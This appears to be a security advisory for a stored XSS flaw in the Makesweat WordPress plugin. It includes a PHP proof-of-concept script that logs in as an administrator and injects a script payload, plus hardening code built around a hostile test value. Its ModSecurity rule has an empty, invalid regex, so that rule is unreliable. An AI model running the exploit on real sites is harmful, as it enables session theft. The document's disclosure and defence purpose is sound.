CVE-2025-13627: Makesweat <= 0.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'makesweat_clubid' Setting (makesweat)
CVE-2025-13627
makesweat
0.1
—

Analysis Overview

Atomic Edge analysis of CVE-2025-13627 (metadata-based):

This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in version 0.1 of the Makesweat WordPress plugin. It exists in the plugin's 'makesweat_clubid' setting. Attackers with administrator-level privileges or higher can inject malicious scripts that persist and execute when affected pages are loaded.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping. The plugin likely accepts user-supplied input for the 'makesweat_clubid' setting without proper validation or sanitization, stores it, and later outputs it to a page without adequate escaping. This inference is based on the CWE-79 classification and the vulnerability description; without a code diff, it follows the standard pattern for stored XSS in WordPress plugins.

Exploitation requires an attacker to have an administrator account on the target WordPress site. The attacker would navigate to the plugin's settings page, likely located at /wp-admin/admin.php?page=makesweat or a similar administrative interface, and submit a malicious payload in the 'makesweat_clubid' parameter. A typical payload would be JavaScript such as alert(document.domain). Upon saving the settings, the payload is stored. The script executes whenever a user, including lower-privileged users, accesses a front-end or back-end page that echoes this unsanitized setting.

Remediation requires applying the proper security functions. The plugin must sanitize the 'makesweat_clubid' input on receipt using a function like sanitize_text_field(), and must escape the output on render using esc_attr() for HTML attributes or esc_html() for text nodes. A proper patch would apply these functions at every point where the setting is retrieved and displayed. The lack of a patched version indicates the plugin may be abandoned.

The impact of successful exploitation is limited by the high privilege requirement: an attacker with administrator access already has extensive control over the site. However, this vulnerability allows persistent script execution in the context of other users' sessions, which could be used to steal session cookies, perform actions on behalf of other administrators, or deface the site. Because the payload is stored, the attack persists across sessions until the malicious setting is removed.

Differential between vulnerable and patched code

No patched version is listed, so no code diff is available; the analysis above is inferred from the CWE-79 classification and the vulnerability description.

ModSecurity Rule

# Atomic Edge WAF Rule – CVE-2025-13627 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" \
    "id:202513627,phase:2,deny,status:403,chain,msg:'CVE-2025-13627 via Makesweat plugin stored XSS',severity:'CRITICAL',tag:'CVE-2025-13627',tag:'WordPress',tag:'Makesweat',tag:'XSS'"
    SecRule ARGS_POST:action "@streq update" "chain"
    SecRule ARGS_POST:makesweat_clubid "@rx []"

Proof of Concept (PHP)

<?php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2025-13627 – Makesweat <= 0.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'makesweat_clubid' Setting

// CONFIGURATION
$target_url = 'https://example.com'; // Base URL of the target WordPress site
$username   = 'admin';               // Administrator username
$password   = 'password';            // Administrator password
$payload    = 'alert("Atomic Edge XSS Test: "+document.domain)'; // XSS payload

// ASSUMPTIONS:
// 1. The plugin settings are saved via a standard WordPress admin POST request.
// 2. The 'makesweat_clubid' parameter is submitted to an admin page, likely under a 'makesweat' menu slug.
// 3. The request requires a valid WordPress nonce and administrator authentication cookies.

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress.
// Fetch the login page first so WordPress sets its test cookie in the cookie jar
// (the login form itself carries no nonce).
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
$login_page = curl_exec($ch);

// Perform login.
$login_data = http_build_query([
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1',
]);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
$login_response = curl_exec($ch);

// Step 2: Access the Makesweat plugin settings page to find the update nonce.
// Assume the settings page slug is 'makesweat'.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=makesweat');
curl_setopt($ch, CURLOPT_POST, false);
$settings_page = curl_exec($ch);

// Extract the nonce for the 'update' action. WordPress often uses '_wpnonce'.
preg_match('/name="_wpnonce" value="([^"]*)"/', $settings_page, $nonce_match);
$update_nonce = $nonce_match[1] ?? '';

if (empty($update_nonce)) {
    die('Could not extract security nonce from settings page. The page structure may differ.');
}

// Step 3: Submit the malicious payload to the settings update handler.
// Assume the form submits to admin-post.php or the same admin.php page.
$exploit_data = http_build_query([
    'action'           => 'update',
    'makesweat_clubid' => $payload,
    '_wpnonce'         => $update_nonce,
    '_wp_http_referer' => '/wp-admin/admin.php?page=makesweat',
]);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$exploit_response = curl_exec($ch);

// Check for success.
if (strpos($exploit_response, 'Settings saved') !== false || curl_getinfo($ch, CURLINFO_HTTP_CODE) == 302) {
    echo "[+] Payload likely injected. Visit any page that outputs the 'makesweat_clubid' setting to trigger XSS.\n";
} else {
    echo "[-] Exploit may have failed. Manual verification required.\n";
}

curl_close($ch);
?>
NOTICE:
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
Frequently Asked Questions
What is CVE-2025-13627?
Overview of the vulnerability
CVE-2025-13627 is a stored cross-site scripting (XSS) vulnerability in the Makesweat plugin for WordPress, affecting versions up to and including 0.1. It allows authenticated users with administrator-level access to inject malicious scripts via the 'makesweat_clubid' setting, which are executed when other users access affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the Makesweat plugin. An attacker with administrator privileges can submit a malicious payload in the 'makesweat_clubid' parameter, which is then stored and executed when users load pages that output this unsanitized data.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Makesweat plugin version 0.1 or earlier is affected. The flaw is exploitable by authenticated users with administrator access; the scripts they inject run in the browsers of other users who load the affected pages.
How can I check if my site is vulnerable?
Steps to identify exposure
To check whether your site is vulnerable, verify that the Makesweat plugin is installed and check its version. If it is version 0.1 or earlier, your site is at risk. Additionally, review your site's settings for any unauthorized changes to the 'makesweat_clubid' parameter.
What are the potential risks of exploitation?
Understanding the impact
If exploited, this vulnerability can lead to persistent script execution in the context of other users' sessions. This could allow attackers to steal session cookies, perform actions on behalf of other users, or deface the site, significantly compromising site security.
How can I fix the vulnerability?
Remediation steps
To remediate this vulnerability, update the Makesweat plugin to a patched version if one is available. If no patch exists, consider disabling the plugin or adding custom code that sanitizes the 'makesweat_clubid' input and escapes its output.
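The following is an added PHP example, not code from the Makesweat plugin or from this page. It puts the stored-XSS pattern the analysis infers for the 'makesweat_clubid' option next to its hardened form: a sanitize callback registered through the real WordPress Settings API (register_setting, sanitize_text_field) and context-specific escaping on output (esc_attr, esc_html). The function names defined in the file, the option group 'makesweat_options' and the identifier whitelist are assumptions. The stand-ins at the bottom approximate the WordPress functions so the file also runs under plain `php`; inside WordPress that block is skipped.

```php
<?php
// Added example, not code from the Makesweat plugin or the Atomic Edge page.
// WordPress functions used (get_option, update_option, register_setting,
// sanitize_text_field, esc_attr, esc_html) are real; the functions defined here,
// the option group 'makesweat_options' and the identifier whitelist are assumptions.

// ---- Vulnerable pattern: store verbatim, echo raw ----------------------------
function vulnerable_save_clubid(string $raw): void {
    // No sanitize callback is registered for the option, so the value is stored as received.
    update_option('makesweat_clubid', $raw);
}

function vulnerable_render_clubid(): string {
    $clubid = get_option('makesweat_clubid', '');
    // Unescaped interpolation into an attribute: a value containing "> breaks out of it.
    return '<input type="text" name="makesweat_clubid" value="' . $clubid . '">';
}

// ---- Hardened form: sanitize on receipt, escape on output ---------------------
function hardened_register_clubid(): void {
    // WordPress applies the sanitize callback on every update_option() for this option.
    register_setting('makesweat_options', 'makesweat_clubid', [
        'type'              => 'string',
        'sanitize_callback' => 'hardened_sanitize_clubid',
        'default'           => '',
    ]);
}

function hardened_sanitize_clubid($raw): string {
    // sanitize_text_field() strips tags and control characters but keeps quotes,
    // so on its own it is not enough for an attribute context.
    $clean = sanitize_text_field((string) $raw);
    // Assumption: a club id is a short identifier, so enforce a whitelist and
    // reject anything else instead of trying to "clean" it.
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $clean) ? $clean : '';
}

function hardened_render_clubid_attr(): string {
    // esc_attr() for an HTML attribute value ...
    return '<input type="text" name="makesweat_clubid" value="'
        . esc_attr(get_option('makesweat_clubid', '')) . '">';
}

function hardened_render_clubid_text(): string {
    // ... and esc_html() for a text node; escaping is applied at every output point.
    return '<p>Club: ' . esc_html(get_option('makesweat_clubid', '')) . '</p>';
}

// ---- Stand-ins for running outside WordPress (approximations, demo only) -----
if (!function_exists('get_option')) {
    $GLOBALS['demo_options']    = [];
    $GLOBALS['demo_sanitizers'] = [];
    function get_option($name, $default = false) {
        return $GLOBALS['demo_options'][$name] ?? $default;
    }
    function update_option($name, $value) {
        // Mirror WordPress: run the registered sanitize callback, if any, before storing.
        $cb = $GLOBALS['demo_sanitizers'][$name] ?? null;
        $GLOBALS['demo_options'][$name] = $cb ? $cb($value) : $value;
        return true;
    }
    function register_setting($group, $name, $args = []) {
        $GLOBALS['demo_sanitizers'][$name] = $args['sanitize_callback'] ?? null;
    }
    function sanitize_text_field($str) {
        return trim(preg_replace('/[\r\n\t ]+/', ' ', strip_tags((string) $str)));
    }
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}

// ---- Demonstration with a constructed hostile value ---------------------------
$hostile = '"><script>alert(document.domain)</script>';

vulnerable_save_clubid($hostile);
echo "vulnerable: " . vulnerable_render_clubid() . "\n";

hardened_register_clubid();                  // from now on, writes pass through the sanitizer
update_option('makesweat_clubid', $hostile); // rejected by the whitelist, stored as ''
echo "hardened:   " . hardened_render_clubid_attr() . "\n";

update_option('makesweat_clubid', 'club-42'); // a legitimate identifier survives
echo "hardened:   " . hardened_render_clubid_text() . "\n";
```

Run it with `php example.php`. The vulnerable render emits the script element inside the page; the hardened render never does, because the callback rejects the value before it is stored and esc_attr()/esc_html() would neutralise the quotes and angle brackets even if a hostile value had reached the option. Input sanitization and output escaping are complementary, which is why the remediation text above calls for both.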
What does a CVSS score of 4.4 mean?
Interpreting the severity rating
A CVSS score of 4.4 indicates a medium severity level for this vulnerability. This suggests that while the vulnerability requires specific conditions to be exploited, it poses a significant risk to the affected systems, particularly because of the potential for persistent XSS attacks.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored on the server. These scripts are executed in the browsers of users who access the affected pages, potentially leading to data theft or unauthorized actions.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration
The proof of concept provided illustrates how an attacker can authenticate as an administrator, navigate to the Makesweat settings, and submit a malicious payload. It shows the HTTP requests needed to exploit the vulnerability, demonstrating how the XSS can be triggered.
What is the recommended approach if I cannot update the plugin?
Alternative mitigation strategies
If you cannot update the Makesweat plugin, consider disabling it or implementing web application firewall rules to block exploitation attempts. Additionally, monitor your site regularly for unusual activity and review user permissions to limit access.
What is the significance of the CWE-79 classification?
Understanding the classification
CWE-79 refers to improper neutralization of input during web page generation, which is the root cause of XSS vulnerabilities. This classification highlights the importance of sanitizing and escaping user input to prevent script injection.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect your WordPress site, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and implement strong user access controls. Additionally, conduct periodic security audits to identify and mitigate potential risks.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website and the internet. Our AI inspection and analysis engine automatically blocks threats before traditional firewall services can inspect, research and build archaic regex filters.